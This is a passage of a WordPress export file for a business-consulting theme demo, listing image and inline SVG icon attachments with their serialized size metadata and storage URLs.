		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box6-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box6-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box6-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/bg1-service-detail/</link>
		<pubDate>Wed, 16 Sep 2020 10:07:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>935</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 10:07:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 10:07:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:204;s:4:"file";s:30:"2020/09/bg1-service-detail.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"bg1-service-detail-300x70.jpg";s:5:"width";i:300;s:6:"height";i:70;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"bg1-service-detail-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"bg1-service-detail-768x180.jpg";s:5:"width";i:768;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"bg1-service-detail-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"bg1-service-detail-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/bg1-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 04:10:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>961</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:10:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:10:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:540;s:4:"file";s:31:"2020/09/bg1-service-detail2.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:31:"bg1-service-detail2-300x138.jpg";s:5:"width";i:300;s:6:"height";i:138;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"bg1-service-detail2-1024x471.jpg";s:5:"width";i:1024;s:6:"height";i:471;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"bg1-service-detail2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"bg1-service-detail2-768x353.jpg";s:5:"width";i:768;s:6:"height";i:353;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail2-600x540.jpg";s:5:"width";i:600;s:6:"height";i:540;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/bg2-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 07:35:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>970</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 07:35:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 07:35:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:31:"2020/09/bg2-service-detail2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:31:"bg2-service-detail2-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"bg2-service-detail2-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"bg2-service-detail2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"bg2-service-detail2-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:32:"bg2-service-detail2-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"bg2-service-detail2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"bg2-service-detail2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:32:"bg2-service-detail2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:32:"bg2-service-detail2-1200x660.jpg";s:5:"width";i:1200;s:6:"height";i:660;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>energy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/energy/</link>
		<pubDate>Thu, 17 Sep 2020 08:34:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/energy.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>980</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:34:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:34:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[energy]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/energy.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/energy.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/bg1-service-detail3/</link>
		<pubDate>Thu, 17 Sep 2020 08:48:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>982</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:48:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:48:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:420;s:4:"file";s:31:"2020/09/bg1-service-detail3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:31:"bg1-service-detail3-300x145.jpg";s:5:"width";i:300;s:6:"height";i:145;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"bg1-service-detail3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"bg1-service-detail3-768x371.jpg";s:5:"width";i:768;s:6:"height";i:371;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail3-600x420.jpg";s:5:"width";i:600;s:6:"height";i:420;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>our-vision</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/our-vision/</link>
		<pubDate>Tue, 22 Sep 2020 04:46:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/our-vision.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1029</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 04:46:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 04:46:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-vision]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/our-vision.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/our-vision.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:22:"2020/09/our-vision.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:22:"our-vision-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"our-vision-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"our-vision-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"our-vision-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"our-vision-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>graph</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/graph/</link>
		<pubDate>Wed, 30 Sep 2020 08:03:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/graph.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1081</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 08:03:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 08:03:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[graph]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/graph.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/graph.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M326.623,133.062c13.785,0,25-11.215,25-25s-11.215-25.001-25-25.001s-25,11.216-25,25.001   c0,5.63,1.872,10.83,5.025,15.014l-41.076,57.401c-2.451-0.805-5.066-1.247-7.784-1.247c-6.569,0-12.551,2.551-17.017,6.709   l-27.379-15.536c0.365-1.696,0.561-3.454,0.561-5.257c0-13.785-11.215-25-25-25s-25,11.215-25,25c0,1.803,0.196,3.561,0.561,5.257   l-27.379,15.536c-4.466-4.158-10.448-6.708-17.017-6.708c-13.785,0-25,11.216-25,25.001s11.215,25.001,25,25.001   s25-11.216,25-25.001c0-1.803-0.196-3.561-0.561-5.257l27.379-15.536c4.466,4.158,10.448,6.709,17.017,6.709   c6.569,0,12.55-2.551,17.017-6.708l27.379,15.536c-0.365,1.696-0.561,3.454-0.561,5.257c0,13.785,11.215,25.001,25,25.001   c13.786,0,25.001-11.216,25.001-25.001c0-5.631-1.873-10.832-5.026-15.016l41.076-57.401   C321.289,132.62,323.905,133.062,326.623,133.062z M326.623,98.061c5.514,0,10,4.486,10,10.001c0,5.514-4.486,10-10,10   s-10-4.486-10-10C316.622,102.547,321.108,98.061,326.623,98.061z M120.115,214.231c-5.514,0-10-4.486-10-10.001   